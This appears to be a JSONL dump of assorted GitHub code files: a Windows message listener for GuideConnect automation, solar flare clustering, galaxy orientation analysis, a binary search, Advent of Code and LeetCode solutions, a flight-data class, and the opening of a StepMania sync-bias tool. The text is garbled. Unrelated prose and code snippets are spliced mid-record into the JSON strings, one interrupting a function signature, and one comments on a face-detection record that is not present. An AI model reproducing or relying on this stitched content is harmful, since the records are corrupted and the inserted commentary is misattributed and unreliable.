+{"seq_id":"74685786115","text":"import subprocess\nimport win32con, win32api, win32gui, ctypes, ctypes.wintypes, threading, pyautogui as pag\nfrom queue import Queue\nfrom Misc.MyFunctions import readFromQueue\n\nqueue = Queue(1)\n\n\ndef thread(thread1, q):\n global data\n data = []\n\n class COPYDATASTRUCT(ctypes.Structure):\n _fields_ = [\n ('dwData', ctypes.wintypes.LPARAM),\n ('cbData', ctypes.wintypes.DWORD),\n ('lpData', ctypes.c_void_p)\n ]\n\n PCOPYDATASTRUCT = ctypes.POINTER(COPYDATASTRUCT)\n\n class Listener:\n def __init__(self):\n message_map = {\n win32con.WM_COPYDATA: self.OnCopyData\n }\n wc = win32gui.WNDCLASS()\n wc.lpfnWndProc = message_map\n wc.lpszClassName = 'MyPythonWindowClass'\n hinst = wc.hInstance = win32api.GetModuleHandle(None)\n classAtom = win32gui.RegisterClass(wc)\n self.hwnd = win32gui.CreateWindow(\n classAtom,\n \"win32gui test\",\n 0,\n 0,\n 0,\n win32con.CW_USEDEFAULT,\n win32con.CW_USEDEFAULT,\n 0,\n 0,\n hinst,\n None\n )\n print(self.hwnd)\n\n def OnCopyData(self, hwnd, 
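The face-detection record above loads haarcascade_frontalface_default.xml from the working directory, and cv2.CascadeClassifier silently yields an empty classifier when the file is missing. A common safeguard, sketched here on the assumption that the opencv-python build exposes cv2.data, is to load the bundled copy and check for emptiness:

import cv2

# opencv-python ships the standard Haar cascades; cv2.data.haarcascades
# is the directory that holds them.
cascade_path = cv2.data.haarcascades + 'haarcascade_frontalface_default.xml'
face_cascade = cv2.CascadeClassifier(cascade_path)
if face_cascade.empty():
    raise IOError('Failed to load Haar cascade from ' + cascade_path)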
msg, wparam, lparam):\n pCDS = ctypes.cast(lparam, PCOPYDATASTRUCT)\n data = ctypes.wstring_at(pCDS.contents.lpData), wparam\n q.queue.clear()\n q.put(data, False)\n\n l = Listener()\n win32gui.PumpMessages()\n\n\napi = threading.Thread(target=thread, args=(\"Thread-1\", queue))\napi.start()\n\nsubprocess.Popen(\"C:\\\\Program Files (x86)\\\\Dolphin\\\\GuideConnect\\\\Guide.EXE\")\n\ndata = readFromQueue(queue)\n\ni = 0\nwhile i < 10:\n data = readFromQueue(queue)\n pag.sleep(2)\n print(data)\n","repo_name":"k13aker/guideautomation","sub_path":"Misc/debug/forloop.py","file_name":"forloop.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1163405067","text":"import numpy as np\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.metrics import davies_bouldin_score\nfrom sklearn.preprocessing import StandardScaler\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\nfrom tqdm import tqdm\nfrom joblib import load\nfrom crispy import CRISP, CRISPNonU\nfrom crispy.spectral import interp_fine\n\ndef db_score(min_k, max_k, ss):\n \"\"\"\n Calculates the Davies-Bouldin score for a range of cluster numbers for a specific set of standardised data.\n\n Parameters\n ----------\n min_k : int\n The minimum number of clusters to try.\n max_k : int\n The maximum number of clusters to try.\n ss : numpy.ndarray\n The standardised data to be clustered (should be of shape (n_samples, n_features)).\n\n Returns\n -------\n dbs : list\n A list of the Davies-Bouldin scores for each of the number of clusters in the cluster range.\n \"\"\"\n\n cluster_range = range(min_k, max_k+1)\n dbs = []\n\n for k in cluster_range:\n km = KMeans(n_clusters=k, n_jobs=-1)\n l = km.fit_predict(ss)\n dbs.append(davies_bouldin_score(ss, l))\n\n return dbs\n\ndef kmeans_predict(data, model, nonu=False):\n \"\"\"\n A function to use the pretrained KMeans model to predict cluster labels for standardised spectra.\n\n Parameters\n ----------\n data : str or crispy.CRISP or crispy.CRISPNonU\n The path to the data or the data object itself which is to be clustered.\n model : str or sklearn.cluster.KMeans\n The path to the KMeans model or the model itself.\n nonu : bool, optional\n Whether or not the wavelengths of the spectra are sampled non-uniformly. 
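Since the Davies-Bouldin index is lower for more compact, better-separated clusterings, the scan returned by db_score above is usually reduced with argmin to choose a cluster count. A usage sketch, assuming ss is the standardised (n_samples, n_features) array from the docstring:

import numpy as np

min_k, max_k = 2, 10
dbs = db_score(min_k, max_k, ss)       # one score per candidate k
best_k = min_k + int(np.argmin(dbs))   # lowest Davies-Bouldin score wins
print(f'best k by Davies-Bouldin index: {best_k}')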
Default is False, it is sampled uniformly.\n\n Returns\n -------\n labels : numpy.ndarray\n An array of the cluster labels for each point reshaped to be the same dimensions as the input image.\n \"\"\"\n if type(data) == str:\n if not nonu:\n data = CRISP(data)\n else:\n data = CRISPNonU(data)\n \n if type(model) == str:\n model = load(model)\n\n wavels = data.wvls\n interp_wavels, interp_spec = interp_fine(wavels, data.data[...], pts=model.cluster_centers_.shape[-1])\n\n spectra = interp_spec.reshape((interp_spec.shape[0],-1)).T # this reshapes into a (n_samples, n_features) shape array where the number of samples is equal to the number of pixels and the number of features is the number of interpolated wavelength points\n\n standard_spectra = StandardScaler().fit_transform(spectra)\n\n labels = model.predict(standard_spectra).reshape((data.shape[-2], data.shape[-1]))\n\n return labels\n\ndef kmeans_ribbons(labels, ribb_clust=0):\n \"\"\"\n A function that takes the labels output by the trained KMeans and returns an array that contains 1 in the locations of the flare ribbons and 0 elsewhere.\n\n Parameters\n ----------\n labels : numpy.ndarray\n The cluster labels from the result of the trained KMeans clustering the data.\n ribb_clust : int, optional\n Which cluster in the trained KMeans model represents the flare ribbon class. Default is 0.\n\n Returns\n -------\n ribbon_labels : numpy.ndarray\n An array containing 1s where the flare ribbons have been identified by the KMeans model and 0 elsewhere.\n \"\"\"\n ribbon_labels = np.zeros_like(labels.flatten())\n\n ribbon_labels[np.where(labels.flatten() == ribb_clust)] = 1\n\n return ribbon_labels.reshape(labels.shape)\n\ndef dbscan_ribbons(ribbon_labels, min_samples=100, eps=0.1, metric=\"euclidean\"):\n \"\"\"\n A function to perform the DBSCAN on the flare ribbon locations to eliminate noise and locate exactly where flare ribbons are (and separation of multiple flare ribbons).\n\n NOTE: DBSCAN is deterministic. There is no trained model because it does not do predictions, it performs the DBSCAN algorithm for each data it sees. This can lead to different optimal DBSCAN parameters for different datasets but it is likely that for a single flare the same DBSCAN parameters should work for all data. tl;dr flares are slightly sensible.\n\n Parameters\n ----------\n ribbon_labels : numpy.ndarray\n An array containing 1s where the flare ribbons have been located by the KMeans model and 0 elsewhere.\n min_samples : int\n The `min_samples` DBSCAN parameter. Default is 100.\n eps : float\n The `eps` DBSCAN parameter. Default is 0.1.\n\n Returns\n -------\n dbribs_img : numpy.ndarray\n An array containing each KMeans-identified flare spectra with its associated DBSCAN cluster label in its rightful spatial location. 
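The three functions in this record compose into a single pipeline: kmeans_predict labels every pixel, kmeans_ribbons masks the flare-ribbon cluster, and dbscan_ribbons denoises and separates the individual ribbons. An end-to-end sketch in which the file paths and the ribbon cluster id are hypothetical:

labels = kmeans_predict('data/crisp_scan.h5', 'models/kmeans.joblib')
mask = kmeans_ribbons(labels, ribb_clust=0)          # 1 = ribbon pixel
ribbons = dbscan_ribbons(mask, min_samples=100, eps=0.1)
# Each spatially connected ribbon now carries its own DBSCAN label,
# DBSCAN noise is -1, and non-ribbon pixels are NaN.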
Points that were not clustered by DBSCAN are represented by NaNs.\n \"\"\"\n dbscan = DBSCAN(min_samples=min_samples, eps=eps, metric=metric)\n\n db_ribbons = []\n flat_ribbs = ribbon_labels.flatten()\n for j in tqdm(range(flat_ribbs.shape[0])):\n if flat_ribbs[j] == 1:\n db_ribbons.append([j % ribbon_labels.shape[-1], j // ribbon_labels.shape[-1], flat_ribbs[j]])\n db_ribbons = np.array(db_ribbons)\n print(db_ribbons.shape)\n\n ss_dbribbons = StandardScaler().fit_transform(db_ribbons)\n db_labels = dbscan.fit_predict(ss_dbribbons)\n\n dbribs_img = np.zeros((ribbon_labels.shape[-2], ribbon_labels.shape[-1]))\n for j in tqdm(range(dbribs_img.shape[-2])):\n for i in range(dbribs_img.shape[-1]):\n try:\n idx = np.where((db_ribbons[:,0] == i) & (db_ribbons[:,1] == j))[0][0]\n dbribs_img[j,i] = db_labels[idx]\n except IndexError:\n dbribs_img[j,i] = np.nan\n\n return dbribs_img","repo_name":"bionictoucan/flare_asymmetries","sub_path":"ribbon_selection.py","file_name":"ribbon_selection.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38244716129","text":"import os.path as path\nimport orientations as ori\nimport gizmo_analysis as gizmo\nimport numpy as np\nimport pandas as pd\n\nsimulation_list = [\n \"../../../data/m12f_cdm-only\",\n \"../../../data/m12i_cdm-only\",\n \"../../../data/m12m_cdm-only\",\n]\n\ndr = rmin = 2\nrmax = 400 + dr\n\nfor sim in simulation_list:\n\n df = {\"tensors\": [], \"angle\": []}\n\n part = gizmo.io.Read.read_snapshots([\"dark\"], \"redshift\", 0, sim)\n\n positions = part[\"dark\"].prop(\"host.distance\")\n dists = part[\"dark\"].prop(\"host.distance.total\")\n\n t0 = ori.getSymmetryAxes(positions, dists, radius=10)\n host_min_ax = t0[2]\n\n for i in np.arange(rmin, rmax, step=dr):\n tensor = ori.getSymmetryAxes(positions, dists, radius=i)\n angle = ori.getMinAngle(tensor[2], host_min_ax) * 180 / np.pi\n df[\"tensors\"].append(tensor)\n df[\"angle\"].append(angle)\n\n df = pd.DataFrame(df)\n df.to_hdf(f\"orientations_present_day_{path.split(sim)[-1]}.hdf\", key=\"w\")\n","repo_name":"jaybaptista/latte_orientations","sub_path":"orientations_present_day_dmo/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42596302298","text":"def binary_search(A, key): # search runs in O(log2 N)\n left = 0\n right = len(A)\n while left < right:\n middle = (left + right) // 2\n if key > A[middle]:\n left = middle + 1\n else:\n right = middle\n if left != len(A) and A[left] == key:\n return left\n else:\n print('{} is not in sequence'.format(key))\n","repo_name":"AndreyZemskov/Algorithms","sub_path":"arrays/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30552470073","text":"# Determine the number of sand tiles that the water can reach assuming that it is always falling downward\n# and clay blocks flow such that it moves left and right\nfrom collections import deque\n\ndef read_file(filename):\n values = []\n with open(filename, 'r') as f:\n for line in f:\n values.append(line.strip())\n\n return values\n\n\ndef test_data():\n return [\"x=495, y=2..7\",\n \"y=7, x=495..501\",\n \"x=501, y=3..7\",\n \"x=498, y=2..4\",\n \"x=506, y=1..2\",\n \"x=498, y=10..13\",\n \"x=504, y=10..13\",\n \"y=13, 
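The binary_search record above maintains a half-open [left, right) window, which is exactly the loop the standard library ships as bisect_left; wrapping it reproduces the same found/not-found behaviour (standalone sketch):

from bisect import bisect_left

def index_of(a, key):
    # bisect_left returns the insertion point, which is a hit only if
    # that slot exists and already holds the key.
    i = bisect_left(a, key)
    return i if i < len(a) and a[i] == key else None

assert index_of([1, 3, 5, 7], 5) == 2
assert index_of([1, 3, 5, 7], 4) is None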
x=498..504\"]\n\n\nif __name__ == '__main__':\n print(\"Starting Day 17-1\")\n # Read file into list of values\n values = read_file('input.txt')\n # values = test_data()\n\n # Create the initial grid with all sand\n grid = [['.'] * 1000 for i in range(2000)]\n # Put in the fountain at 500,0\n grid[0][500] = '+'\n\n # Go through each piece of the input and fill in the rows/cols being described as clay\n min_x = 1000\n max_x = 0\n max_y = 0\n for val in values:\n items = val.replace(',', '').split()\n if 'x' in items[0]:\n x = int(items[0][2:])\n if x < min_x:\n min_x = x\n elif x > max_x:\n max_x = x\n start_y, end_y = map(int, items[1][2:].split('..'))\n for y in range(start_y, end_y + 1):\n if y > max_y:\n max_y = y\n grid[y][x] = '#'\n elif 'y' in items[0]:\n y = int(items[0][2:])\n if y > max_y:\n max_y = y\n start_x, end_x = map(int, items[1][2:].split('..'))\n for x in range(start_x, end_x + 1):\n if x < min_x:\n min_x = x\n elif x > max_x:\n max_x = x\n grid[y][x] = '#'\n\n # Need a little buffer here\n min_x -= 5\n max_x += 5\n\n # Debug print out grid\n # for y in range(0, max_y + 2):\n # for x in range(min_x - 1, max_x + 2):\n # print(grid[y][x], end='')\n # print()\n # print(\"Map size is x={0!s}-{1!s}, y=0-{2!s}\".format(min_x, max_x, max_y))\n # print()\n\n\n # Recursion doesn't work here because it goes beyond the limits of what the computer can do, so we\n # need to do it a different way. This time we will use a queue for determining which spots we need\n # to start from. That spot will recurse left and right if necessary, but going up and down will be done\n # via the queue\n queue = deque()\n\n def flow_down(x, y):\n # First, if we are beyond the max, then just stop here\n if x < min_x or x > max_x or y > max_y:\n return True\n\n # Check what the current space is\n space = grid[y][x]\n if space == '.':\n # This is sand, so we need to check the space below for more sand\n grid[y][x] = '|'\n if grid[y + 1][x] == '.':\n # We can go down, so add to queue\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n # The space below is already water, so it must have been covered by another path\n return True\n else:\n # Space below is not sand, must be clay so try to go left and right\n free_left = flow_left(x - 1, y)\n free_right = flow_right(x + 1, y)\n if free_left or free_right:\n # Either left or right is free, so we just return\n return True\n else:\n # Neither left nor right is free, so we turn them to standing water and put the\n # space above back on the queue\n flow_left(x - 1, y, True)\n flow_right(x + 1, y, True)\n grid[y][x] = '~'\n queue.append((x, y - 1))\n return False\n elif space == '|':\n # This is water, so we have been here already, check space below to see if we are going back\n # up or if this is repeating. If it's wall or standing water below, we want to try left and\n # right, but for sand or water, just ignore\n if grid[y + 1][x] == '.' 
or grid[y + 1][x] == '|':\n return True\n free_left = flow_left(x - 1, y)\n free_right = flow_right(x + 1, y)\n if free_left or free_right:\n # Either left or right is free, so we just return\n return True\n else:\n # Neither left nor right is free, so we turn them to standing water and put the space\n # above back on the queue\n flow_left(x - 1, y, True)\n flow_right(x + 1, y, True)\n grid[y][x] = '~'\n queue.append((x, y - 1))\n return False\n elif space == '~':\n # This is standing water, so this area has already been processed, try to go back up if\n # possible\n queue.append((x, y - 1))\n return True\n else:\n print(\"We hit a weird state, investigate {0!s},{1!s}\".format(x,y))\n return False\n\n def flow_left(x, y, set_standing=False):\n # Check the space\n space = grid[y][x]\n if space == '#':\n # We hit clay, so return that this is blocked\n return False\n elif space == '|':\n # This is existing water, make it standing if asked, then treat it like a sand spot\n if set_standing:\n grid[y][x] = '~'\n if grid[y + 1][x] == '.':\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n return True\n else:\n return flow_left(x - 1, y, set_standing)\n elif space == '~':\n # Ignore standing water\n return flow_left(x - 1, y)\n elif space == '.':\n # This is sand, so check to see if we can flow down, if yes then add to queue, otherwise\n # continue left\n grid[y][x] = '|'\n if grid[y + 1][x] == '.':\n # We can go down, so add to queue\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n # Water is already flowing this way, so we are good\n return True\n else:\n return flow_left(x - 1, y)\n\n return False\n\n def flow_right(x, y, set_standing=False):\n # Check the space\n space = grid[y][x]\n if space == '#':\n # We hit clay, so return that this is blocked\n return False\n elif space == '|':\n # This is existing water, make it standing if asked, then treat it like a sand spot\n if set_standing:\n grid[y][x] = '~'\n if grid[y + 1][x] == '.':\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n return True\n else:\n return flow_right(x + 1, y, set_standing)\n elif space == '~':\n # Ignore standing water\n return flow_right(x + 1, y)\n elif space == '.':\n # This is sand, so check to see if we can flow down, if yes then add to queue, otherwise\n # continue left\n grid[y][x] = '|'\n if grid[y + 1][x] == '.':\n # We can go down, so add to queue\n queue.append((x, y + 1))\n return True\n elif grid[y + 1][x] == '|':\n # Water is already flowing this way, so we are good\n return True\n else:\n return flow_right(x + 1, y)\n\n return False\n\n # Start the flow of water below the fountain\n queue.append((500, 1))\n count = 0\n while len(queue) > 0:\n count += 1\n # for y in range(72,91):\n # for x in range(490,515):\n # print(grid[y][x], end='')\n # print()\n # print()\n x,y = queue.popleft()\n flow_down(x, y)\n\n # Print out grid again\n for y in range(0, max_y + 2):\n print(\"{0!s:>4}\".format(y), end='')\n for x in range(min_x - 1, max_x + 2):\n print(grid[y][x], end='')\n print()\n\n # Print out answer\n water_tiles = 0\n standing_water_tiles = 0\n for row in grid:\n for cell in row:\n if cell == '|' or cell == '~':\n water_tiles += 1\n if cell == '~':\n standing_water_tiles += 1\n\n print(\"Number of water tiles: {0!s}\".format(water_tiles))\n print(\"Number of standing water tiles: 
{0!s}\".format(standing_water_tiles))\n","repo_name":"theknoxinator/AoC","sub_path":"2018/Day17/day17-1.py","file_name":"day17-1.py","file_ext":"py","file_size_in_byte":8838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13694920772","text":"class Solution:\n def removeDuplicateLetters(self, s: str) -> str:\n stack = []\n ht = {c:i for i,c in enumerate(s)}\n for i, c in enumerate(s):\n if c in stack:\n continue\n while stack and stack[-1] > c and i < ht[stack[-1]]:\n stack.pop()\n stack.append(c)\n\n return ''.join(stack)","repo_name":"pdkz/leetcode","sub_path":"0316_Remove_Duplicate_Letters/0316_Remove_Duplicate_Letters.py","file_name":"0316_Remove_Duplicate_Letters.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1951037006","text":"class Flights:\n # Default Constructor\n def __init__(self):\n self.start_airport = 'SLC'\n self.end_airport = 'Rome'\n self.date_leave = 'Jul 31'\n self.date_leave_orig = self.date_leave\n self.date_leave_final = self.date_leave\n self.date_return = 'Aug 3'\n self.date_return_orig = self.date_return\n self.price = 1200\n self.duration = 10\n self.flight_type = 'Round Trip'\n self.date_list = []\n self.price_list = []\n self.date_mat = []\n self.dates_length_list = []\n self.dates_length_mat = []\n self.price_mat = []\n self.month_list = []\n self.year_price_mat = [[] for x in range(0, 12)]\n self.flight_ind = 0\n self.num_flights = 1\n\n # Getters\n def get_start_airport(self, nargout):\n if nargout == 1:\n return self.start_airport\n else:\n print(self.start_airport)\n\n def get_end_airport(self, nargout):\n if nargout == 1:\n return self.end_airport\n else:\n print(self.end_airport)\n\n def get_date_leave(self, nargout):\n if nargout == 1:\n return self.date_leave\n else:\n print(self.date_leave)\n\n def get_date_return(self, nargout):\n if nargout == 1:\n return self.date_return\n else:\n print(self.date_return)\n\n def get_price(self, nargout):\n if nargout == 1:\n return str(self.price)\n else:\n print(self.price)\n\n def get_duration(self, nargout):\n if nargout == 1:\n return str(self.duration)\n else:\n print(self.duration)\n\n def get_flight_type(self, nargout):\n if nargout == 1:\n return self.flight_type\n else:\n print(self.flight_type)\n\n def get_flight_info(self):\n print('--------------------------------------')\n print('Flight from ' + self.get_start_airport(1) + ' to ' + self.get_end_airport(1) +\n ' (' + self.get_flight_type(1) + ')')\n print('--------------------------------------')\n print('Departure: ' + self.get_date_leave(1))\n print('Return: ' + self.get_date_return(1))\n print('Price: $' + self.get_price(1))\n print('Duration: ' + self.get_duration(1) + ' hrs')\n\n # Setters\n def set_start_airport(self, new_start_airport):\n self.start_airport = new_start_airport\n\n def set_end_airport(self, new_end_airport):\n self.end_airport = new_end_airport\n\n def set_date_leave(self, new_date_leave):\n self.date_leave = new_date_leave\n\n def set_date_return(self, new_date_return):\n self.date_return = new_date_return\n\n def set_price(self, new_price):\n self.price = new_price\n\n def set_duration(self, new_duration):\n self.duration = new_duration\n\n def set_flight_type(self, new_flight_type):\n self.flight_type = new_flight_type\n\n def set_flight_info(self, new_flight_info):\n # Unpack flight info (new_flight_info is list\n new_start_airport = new_flight_info[0]\n 
new_end_airport = new_flight_info[1]\n new_date_leave = new_flight_info[2]\n new_date_return = new_flight_info[3]\n new_price = new_flight_info[4]\n new_duration = new_flight_info[5]\n new_flight_type = new_flight_info[6]\n\n # Store flight info in object\n self.set_start_airport(new_start_airport)\n self.set_end_airport(new_end_airport)\n self.set_date_leave(new_date_leave)\n self.set_date_return(new_date_return)\n self.set_price(new_price)\n self.set_duration(new_duration)\n self.set_flight_type(new_flight_type)\n","repo_name":"jjc999/Flight_Scraper","sub_path":"Original_GoogleFlightsScrape/Flights.py","file_name":"Flights.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6883972521","text":"_VERSION = '0.8.1'\n\nfrom collections.abc import Container\nimport csv\nfrom datetime import datetime as dt\nfrom enum import IntEnum\nimport logging\nimport os\nimport re\nimport sys\nimport unicodedata\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import ticker as mticker\nfrom scipy import signal\nfrom pydub import AudioSegment\n\nimport simfile\nfrom simfile.timing import TimingData\nfrom simfile.timing.engine import TimingEngine\n\n_NINEORNULL_NULL = 0\n_NINEORNULL_P9MS = 9\n_CSV_FIELDNAMES = [\n 'path',\n 'slot',\n 'bias',\n 'conf',\n 'interquintile',\n 'stdev',\n 'paradigm',\n 'timestamp',\n 'fingerprint_ms',\n 'window_ms',\n 'step_ms',\n 'kernel_type',\n 'kernel_target',\n 'sample_rate',\n 'title',\n 'titletranslit',\n 'subtitle',\n 'subtitletranslit',\n 'artist',\n 'artisttranslit',\n]\n_PARAMETERS = {\n # Default parameters.\n 'root_path': 'Path to a simfile, pack, or collection of packs to analyze. If not provided, the GUI is invoked instead.',\n 'report_path': 'The destination directory for the sync bias report and audio fingerprint plots. If not provided, defaults to \"/__bias-check\".',\n 'consider_null': 'Consider charts close enough to 0ms bias to be \"correct\" under the null (StepMania) sync paradigm.',\n 'consider_p9ms': 'Consider charts close enough to +9ms bias to be \"correct\" under the In The Groove sync paradigm.',\n 'tolerance': 'If a simfile\\'s sync bias lands within a paradigm ± this tolerance, that counts as \"close enough\".',\n 'confidence_limit': 'If the confidence in a simfile\\'s sync bias is below this value, it will not be considered for unbiasing.',\n 'fingerprint_ms': '[ms] Time margin on either side of the beat to analyze.',\n 'window_ms': '[ms] The spectrogram algorithm\\'s moving window parameter.',\n 'step_ms': '[ms] Controls the spectrogram algorithm\\'s overlap parameter, but expressed as a step size.',\n 'kernel_target': 'Choose whether to convolve with the beat digest (\"digest\") or the spectral accumulator (\"accumulator\").',\n 'kernel_type': 'Choose a kernel that responds to a rising edge (\"rising\") or local loudness (\"loudest\").',\n 'magic_offset_ms': '[ms] Add a constant value to the time of maximum kernel response. I haven\\'t tracked the cause of this down yet. Might be related to attack perception?',\n 'full_spectrogram': 'Analyze the full spectrogram in one go - this will make the program run slower...',\n 'to_paradigm': 'Choose a target paradigm for the pack unbiasing step. 
This will modify your simfiles!'\n}\n_THEORETICAL_UPPER = 0.83\n_NEARNESS_SCALAR = 10 # milliseconds\n_NEARNESS_OFFSET = 0.5 # milliseconds\n\nclass FloatRange(Container):\n # Endpoint inclusive.\n def __init__(self, lo=None, hi=None):\n self.lo = lo\n self.hi = hi\n\n def __iter__(self):\n return iter([f'>= {self.lo}', f'<= {self.hi}'])\n\n def __contains__(self, value):\n if (self.lo is not None) and (value < self.lo):\n return False\n if (self.hi is not None) and (value > self.hi):\n return False\n return True\n\nclass BiasKernel(IntEnum):\n RISING = 0\n LOUDEST = 1\n\nclass KernelTarget(IntEnum):\n DIGEST = 0\n ACCUMULATOR = 1\n\n\n_PARAM_DEFAULTS = {\n # Default parameters.\n 'root_path': None,\n 'report_path': None,\n 'consider_null': True,\n 'consider_p9ms': True,\n 'tolerance': 3.0,\n 'confidence_limit': 80,\n 'fingerprint_ms': 50,\n 'window_ms': 10,\n 'step_ms': 0.2,\n 'kernel_target': KernelTarget.DIGEST,\n 'kernel_type': BiasKernel.RISING,\n 'magic_offset_ms': 0.0,\n 'full_spectrogram': False,\n 'to_paradigm': None\n}\n\ndef timestamp():\n return dt.utcnow().strftime('%Y%m%d-%H%M%S-%f')[:-3]\n\n\ndef slot_abbreviation(steps_type, chart_slot, chart_index=0, paradigm='null'):\n logging.info(steps_type)\n logging.info(chart_slot)\n if paradigm == '+9ms':\n map_style = {\n 'dance-single': 'S',\n 'dance-double': 'D'\n }\n map_slot = {\n 'Challenge': 'X',\n 'Hard': 'H',\n 'Medium': 'M',\n 'Easy': 'E',\n 'Beginner': 'N',\n 'Edit': '.'\n }\n return map_style.get(steps_type, '?') \\\n + map_slot.get(chart_slot, '?') \\\n + (chart_slot == 'Edit' and f'{chart_index}' or '')\n else: # Charts that don't fit a paradigm are probably DDR charts...no shade but\n map_style = {\n 'dance-single': 'SP',\n 'dance-double': 'DP'\n }\n map_slot = {\n 'Challenge': 'C',\n 'Hard': 'E',\n 'Medium': 'D',\n 'Easy': 'B',\n 'Beginner': 'b',\n 'Edit': 'X'\n }\n return map_slot.get(chart_slot, '?') \\\n + (chart_slot == 'Edit' and f'{chart_index}' or '') \\\n + map_style.get(steps_type, '?')\n\n\ndef slot_expansion(abbr):\n if abbr[-2:] in ['SP', 'DP']:\n map_style = {\n 'SP': 'dance-single',\n 'DP': 'dance-double'\n }\n map_slot = {\n 'C': 'Challenge',\n 'E': 'Hard',\n 'D': 'Medium',\n 'B': 'Easy',\n 'b': 'Beginner',\n 'X': 'Edit'\n }\n steps_type = map_style[abbr[-2:]]\n chart_slot = map_slot[abbr[0]]\n if len(abbr) > 3:\n chart_index = int(abbr[1:-2])\n else:\n chart_index = None\n elif abbr[0] in ['S', 'D']:\n map_style = {\n 'S': 'dance-single',\n 'D': 'dance-double'\n }\n map_slot = {\n 'X': 'Challenge',\n 'H': 'Hard',\n 'M': 'Medium',\n 'E': 'Easy',\n 'N': 'Beginner',\n '.': 'Edit'\n }\n steps_type = map_style[abbr[0]]\n chart_slot = map_slot[abbr[1]]\n if len(abbr) > 2:\n chart_index = int(abbr[2:])\n else:\n chart_index = None\n else:\n raise Exception(f'Couldn\\'t deduce meaning of slot abbreviation \"{abbr}\"')\n\n return steps_type, chart_slot, chart_index\n\n\ndef slugify(value, allow_unicode=False):\n \"\"\"\n https://stackoverflow.com/questions/295135/turn-a-string-into-a-valid-filename\n Taken from https://github.com/django/django/blob/master/django/utils/text.py\n Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated\n dashes to single dashes. Remove characters that aren't alphanumerics,\n underscores, or hyphens. Convert to lowercase. 
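slot_abbreviation and slot_expansion above are meant to round-trip between a (steps type, difficulty) pair and the compact chart label used in reports, ITG-style under the '+9ms' paradigm and DDR-style otherwise. An illustration of the round trip, with outputs worked out from the mapping tables:

abbr = slot_abbreviation('dance-single', 'Challenge', paradigm='+9ms')
# 'SX': style letter then slot letter (ITG-style)
assert slot_expansion(abbr) == ('dance-single', 'Challenge', None)

abbr = slot_abbreviation('dance-double', 'Hard')  # default 'null' paradigm
# 'EDP': slot letter then style code (DDR-style)
assert slot_expansion(abbr) == ('dance-double', 'Hard', None)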
Also strip leading and\n trailing whitespace, dashes, and underscores.\n \"\"\"\n value = str(value)\n if allow_unicode:\n value = unicodedata.normalize('NFKC', value)\n else:\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')\n value = re.sub(r'[^\\w\\s-]', '', value)\n return re.sub(r'[-\\s]+', '-', value).strip('-_')\n\n\ndef timedelta_as_hhmmss(delta):\n total_sec = int(delta.total_seconds())\n h = total_sec // 3600\n m = (total_sec % 3600) // 60\n s = (total_sec % 60)\n return f'{h:02d}:{m:02d}:{s:02d}'\n\n\ndef guess_paradigm(sync_bias_ms, tolerance=3, consider_null=True, consider_p9ms=True, short_paradigm=True, **kwargs):\n if consider_null and (sync_bias_ms > _NINEORNULL_NULL - tolerance and sync_bias_ms < _NINEORNULL_NULL + tolerance):\n return short_paradigm and 'null' or 'probably null'\n elif consider_p9ms and (sync_bias_ms > _NINEORNULL_P9MS - tolerance and sync_bias_ms < _NINEORNULL_P9MS + tolerance):\n return short_paradigm and '+9ms' or 'probably +9ms'\n else:\n return short_paradigm and '????' or 'unclear paradigm'\n\n\ndef plot_fingerprint(fingerprint, target_axes, **kwargs):\n # Set up visuals to show the user what's going on.\n times_ms = fingerprint['time_values']\n frequencies_kHz = fingerprint['frequencies']\n acc = fingerprint['freq_domain']\n digest = fingerprint['beat_digest']\n beat_indices = fingerprint['beat_indices']\n sync_bias = fingerprint['bias_result']\n post_kernel_flat = fingerprint['convolution']\n post_kernel = fingerprint['post_kernel']\n plot_title = fingerprint['plots_title']\n fingerprint_ms = kwargs.get('fingerprint_ms', 50)\n magic_offset_ms = kwargs.get('magic_offset_ms', 0.0)\n kernel_target = kwargs.get('kernel_target', KernelTarget.DIGEST)\n hide_yticks = kwargs.get('hide_yticks', False)\n\n edge_discard = 5 # TODO: pull in from calling function I guess\n if beat_indices is None:\n beat_indices = np.arange(digest.shape[0])\n\n time_ticks = np.hstack((\n np.arange(0, times_ms[ 0]-1, -10),\n np.arange(0, times_ms[-1]+1, 10)\n ))\n frequency_line = np.ones(np.shape(frequencies_kHz)) * sync_bias\n beatindex_line = np.ones(np.shape(digest)[0]) * sync_bias\n post_kernel_over_freq = np.interp(\n post_kernel_flat,\n (\n post_kernel_flat[edge_discard:-edge_discard].min(),\n post_kernel_flat[edge_discard:-edge_discard].max()\n ),\n (\n frequencies_kHz.min() * 0.9 + frequencies_kHz.max() * 0.1,\n frequencies_kHz.min() * 0.1 + frequencies_kHz.max() * 0.9\n ))\n post_kernel_over_beat = np.interp(\n post_kernel_flat,\n (\n post_kernel_flat[edge_discard:-edge_discard].min(),\n post_kernel_flat[edge_discard:-edge_discard].max()\n ),\n (\n beat_indices.min() * 0.9 + beat_indices.max() * 0.1,\n beat_indices.min() * 0.1 + beat_indices.max() * 0.9\n ))\n\n # Accumulator in frequency domain\n ax = 